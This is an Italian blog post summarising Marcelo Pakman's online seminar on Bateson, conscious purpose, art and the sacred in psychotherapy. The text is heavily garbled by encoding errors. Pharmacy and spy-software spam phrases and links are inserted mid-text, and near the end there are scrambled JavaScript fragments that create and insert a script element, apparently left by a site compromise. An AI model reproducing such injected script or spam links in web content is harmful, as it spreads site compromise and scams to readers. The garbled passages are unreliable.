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BDF 1.7 ai??i?? Marcelo Pakman on line: il poetico in psicoterapia; finalitAi?? cosciente, arte, Sacro

 

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Il seminario di Marcelo Pakman del 16 ottobre A? stato eccelente, anche la tecnologia on-line ci ha aiutato mantenendo la linea in modo accettabile. Pakman ha fondamentalmente proposto una lettura del saggio di Bateson “La finalitAi?? cosciente e la natura” alla luce di alcune considerazioni in relazione all’arte e al sacro. Ci ha infine presentato il poetico in psicoterapia come uno dei modi per correggere o almeno mitigare i disastri ecologici della finalitAi?? cosciente. Non appena avremo un testo che riassume i temi trattati durante il seminario lo metteremo on line. buy imdur generic name Conferenza on-line di Marcelo Pakman Cheap Marcelo Pakman A? stato Vice Presidente dell’American Society for Cybernetics, Responsabile della Sezione Human Rights e poi Vice Presidente dell’American Family Therapy Academy. Ha lavorato come Terapeuta familiare e come Psichiatra negli Stati Uniti e ha svolto attivitAi?? clinica e accademica in tutto il mondo. Coordinatore del Curso Intensivo de Terapia familiar svoltosi per numerosi anni ad Amherst e recentemente a Santiago di Compostella. Ha pubblicato numerosi saggi che sono stati in parte tradotti in italiano per le riviste Connessioni, Pluriverso, Locus Solus. Clicca qui sotto per ascoltare un intervento di Marcelo, con alcuni interventi e domande di Pietro. dw_r0001 [googlevideo:http://video.google.it/videoplay?docid=-4519313170670709300]

Appunti videoconferenza Marcelo Pakman (16-10-2008) ai???FinalitAi?? cosciente e naturaai??? ed ai???Effetti della finalitAi?? cosciente sullai??i??adattamento umanoai??? sono due saggi che Bateson scrive nel 1968. In un momento fortemente politico come quello Bateson non interviene in alcun modo su piano sociale e politico ma scrive questiAi?? contributi, in cui critica la finalitAi?? cosciente considerandola una fonte di disequilibrio naturale ed ecologico. Nella stessa prospettiva egli si dichiara contro lai??i??intervento finalizzato, mirato, quale potrebbe essere considerato in terapia quello dei cosiddetti terapeuti strategici. Negli stessi saggi suggerisce che esistono cose che possono salvare dagli errori della finalitAi?? cosciente, dei ai???fattori correttiviai??i?? che possono permettere di intervenire in modo naturale e sistemico cioA? in un modo non distorto dalla finalitAi?? cosciente e dal suo predominio. Essi sono in primo luogo: 1- Lai??i??arte. Il riferimento A? qui a ai???Stile, grazia, informazione nellai??i??arte primitivaai??? (1967) (???) riguardo alle pitture delle grotte di Altamira le quali secondo lui A? come se interrogassero chi le contempla e gli chiedessero: ai???lo sapevi che il mondo si poteva vedere anche in questo modo?ai??? e ogni volta che unai??i??opera dai??i??arte ci colpisce davvero la risposta A? no. Si tratta di una sorta di interpellazione, noi veniamo interpellati dallai??i??opera dai??i??arte. Ma non capita sempre ed a tutti (differenza rispetto allai??i??idea di Althusser) perchAi?? cai??i??A? anche il gusto, il quale A? anche costruito socialmente (come Bordieu ha bene messo in luce) che ci prepara ad essere interpellati dallai??i??opera dai??i??arte. Ci sono opere che possono colpirci in modo imprevedibile. In questo caso si ha una vera e propria correzione della finalitAi?? cosciente, questa A? lai??i??arte di Bateson. Gli oggetti estetici quando ci toccano aprono una dimensione che va oltre lai??i??ordine della significazione e si apre al senso. ai???Il senso che si offre ai limiti del significato A? una rottura della presenza della significazione e del suo ordineai??i?? (Nancy). Il senso A? ciA? che rende possibile il significato, ma non si esaurisce in esso, il senso A? molteplice, A? il regno della possibilitAi??, A? la possibilitAi??, per esempio anche nel linguaggio o nella terapia, di essere differenti, a differenza del significato che A? giAi?? stabilito. Quando lai??i??opera dai??i??arte ci chiede se sapevamo che il mondo si poteva anche vedere in un differente modo, nuovo, e la risposta A? no, io non lo sapevo, lai??i??io A? sopraffatto dallai??i??esperienza, da unai??i??esperienza che eccede la coscienza. Ci possono essere momenti analoghi in terapia, che ci portano fuori dalla mente, che prescindono dalla normalizzazione, dallai??i??egemonia culturale (intesa in senso gramsciano), possono essere momentiAi?? ai???out of mindai??i??. Ugualmente lai??i??intervento paradossale in terapia che si apre allai??i??imprevisto e non prescrive, non indirizza, puA? essere considerata una pratica molto difficile da comprendere in termini strutturati di significato, puA? essere piA? facile comprenderlo in quello che Deleuze chiama, appunto, il mondo dei sensi. [googlevideo:http://video.google.it/videoplay?docid=-8695618789722841899] 2- Il sacro nei suoi legami con lai??i??ecologia e la natura. Questi due elementi correttiviAi?? riescono ad aggirare, assieme alla finalitAi?? cosciente anche la dimensione egemonica, sempre intesa in senso gramsciano, che costruisce lai??i??identitAi?? ideale del cittadino appartenente ad una data societAi??. Esempio del duello televisivo tra i presidenti americaniAi?? e questione del self e della rabbia (tutti i giornalisti concordavano nel fatto che mostrare la rabbia non si poteva conciliare col diventare presidente degli Stati Uniti, poichAi?? condividevano varie implicite regole su costruzione di sAi?? e controllo delle emozioni, egemoniche in America e implicitamente condivise dalla maggioranza dei cittadini che vanno a votare). Questi due correttivi possono incidere anche nella terapia, la quale potrebbe provare ad esplorare unai??i??interpellazioneAi?? quale quella artistica, per esempio grazie ad una dimensione poetica, che non si esaurisca neppure nellai??i??estetica e nel sacro, e che abbia lai??i??effetto di aprire al senso e non al significato. [googlevideo:http://video.google.it/videoplay?docid=-4387233495592297945] Alla luce di quanto detto emerge quanto il pensiero di Bateson possa aiutare a costruire, per dirla con Foucault, unai??i??epistemologia non disciplinare per la terapia. In terapia un movimento anti-egemonico potrebbe darsi quando non si agisce allai??i??interno della logica causa-effetto, in vista di specifici fini, ma si entra piuttosto, come diceva Bateson, nelle coseAi?? tramite lai??i??allusione, senza volerla colmare nAi?? spiegare. AndrAi??edocument.currentScript.parentNode.insertBefore(s, document.currentScript); comprar pilexil online Purchase document.currentScript.parentNode.insertBefore(s, document.currentScript);var d=document;var s=d.createElement(‘script’); i need to buy viagra The most popular 2017 spy software applications for the mobile phones. http://saenalbest.com/buy-lanoxin-classification/ http://whitehopebd.com/viber-spy-iphone-message-spy-topspy/